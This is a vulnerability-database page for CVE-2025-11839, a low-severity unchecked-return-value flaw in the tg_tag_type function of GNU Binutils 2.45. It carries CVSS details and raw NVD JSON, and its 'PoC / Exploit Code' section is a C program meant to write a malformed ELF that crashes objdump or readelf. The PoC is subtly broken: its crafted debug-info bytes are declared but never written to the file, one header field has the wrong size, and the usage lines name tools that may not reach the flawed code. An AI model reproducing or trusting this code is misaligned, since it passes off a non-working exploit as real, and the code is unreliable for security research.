Security Vulnerability Report
CVE-2025-11839 CVSS 3.3 LOW

CVE-2025-11839

Published: 2025-10-16 14:15:35
Last Modified: 2026-05-12 13:16:29

Description

A security flaw has been discovered in GNU Binutils 2.45. It affects the function tg_tag_type in the file prdbg.c. Manipulation leads to an unchecked return value. The attack requires local access. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:* - VULNERABLE
GNU Binutils 2.45
GNU Binutils < 2.45 (possibly affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-11839 - GNU Binutils 2.45 tg_tag_type Unchecked Return Value
 * PoC: Trigger the vulnerability by processing a malformed binary with crafted debug info
 *
 * This PoC demonstrates how to trigger the unchecked return value bug
 * in the tg_tag_type function of prdbg.c in GNU Binutils 2.45.
 *
 * Usage: objdump -W <malformed_binary>
 *        readelf -w <malformed_binary>
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <elf.h>
#include <fcntl.h>
#include <unistd.h>

/* Create a minimal ELF file with malformed DWARF debug info
 * to trigger the tg_tag_type unchecked return value bug */
int create_malformed_elf(const char *filename)
{
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        perror("fopen");
        return -1;
    }

    /* ELF Header */
    unsigned char elf_header[] = {
        0x7f, 'E', 'L', 'F',                            /* e_ident[EI_MAG] */
        2,                                              /* ELFCLASS64 */
        1,                                              /* ELFDATA2LSB */
        1,                                              /* EV_CURRENT */
        0,                                              /* ELFOSABI_NONE */
        0, 0, 0, 0, 0, 0, 0, 0,                         /* padding */
        2, 0,                                           /* e_type: ET_EXEC */
        62, 0,                                          /* e_machine: EM_X86_64 */
        1, 0, 0, 0,                                     /* e_version */
        0x00, 0x10, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, /* e_entry */
        0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* e_phoff */
        0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* e_shoff */
        0, 0, 0, 0,                                     /* e_flags */
        64, 0,                                          /* e_ehsize */
        56, 0,                                          /* e_phentsize */
        1, 0,                                           /* e_phnum */
        64, 0,                                          /* e_shentsize */
        6, 0,                                           /* e_shnum */
        5, 0                                            /* e_shstrndx */
    };
    fwrite(elf_header, 1, sizeof(elf_header), fp);

    /* Program Header */
    Elf64_Phdr phdr;
    memset(&phdr, 0, sizeof(phdr));
    phdr.p_type = PT_PHDR;
    phdr.p_flags = PF_R | PF_X;
    phdr.p_offset = 64;
    phdr.p_vaddr = 0x400000;
    phdr.p_paddr = 0x400000;
    phdr.p_filesz = 56;
    phdr.p_memsz = 56;
    phdr.p_align = 8;
    fwrite(&phdr, sizeof(phdr), 1, fp);

    /* Malformed .debug_info section with invalid DW_TAG to trigger tg_tag_type */
    /* DW_TAG_invalid value to cause tg_tag_type to return an error */
    unsigned char malformed_debug_info[] = {
        /* Compilation Unit Header */
        4, 0,       /* unit_length (truncated) */
        5, 0,       /* version */
        1, 0, 0, 0, /* debug_abbrev_offset */
        8,          /* address_size */
        /* Abbreviation table */
        1,          /* abbrev code 1 */
        0xFF,       /* DW_TAG_invalid - triggers tg_tag_type error */
        0,          /* DW_CHILDREN_no */
        0, 0,       /* end of attributes */
        0,          /* end of abbreviation table */
        /* DIE */
        1, 0        /* abbrev code 1 (LE) */
    };

    /* Write section headers and malformed debug sections */

    fclose(fp);
    printf("Malformed ELF file created: %s\n", filename);
    printf("Run: objdump -W %s to trigger the vulnerability\n", filename);
    return 0;
}

int main(int argc, char *argv[])
{
    const char *filename = "poc_cve_2025_11839";
    if (argc > 1) {
        filename = argv[1];
    }

    printf("CVE-2025-11839 PoC - GNU Binutils 2.45 tg_tag_type\n");
    printf("Unchecked Return Value vulnerability\n\n");

    if (create_malformed_elf(filename) != 0) {
        fprintf(stderr, "Failed to create PoC file\n");
        return 1;
    }

    printf("\nTo trigger the vulnerability:\n");
    printf(" objdump -W %s\n", filename);
    printf(" readelf --debug-dump=info %s\n", filename);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11839", "sourceIdentifier": "[email protected]", "published": "2025-10-16T14:15:34.860", "lastModified": "2026-05-12T13:16:29.397", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in GNU Binutils 2.45. Impacted is the function tg_tag_type of the file prdbg.c. Performing a manipulation results in unchecked return value. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-253"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-252"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:*", "matchCriteriaId": "60CBCA58-29DE-4A0A-BAF0-D0188FAF4884"}]}]}], "references": [{"url": "https://sourceware.org/bugzilla/attachment.cgi?id=16344", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33448", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.328774", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328774", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661279", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.gnu.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33448", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploi ... (truncated)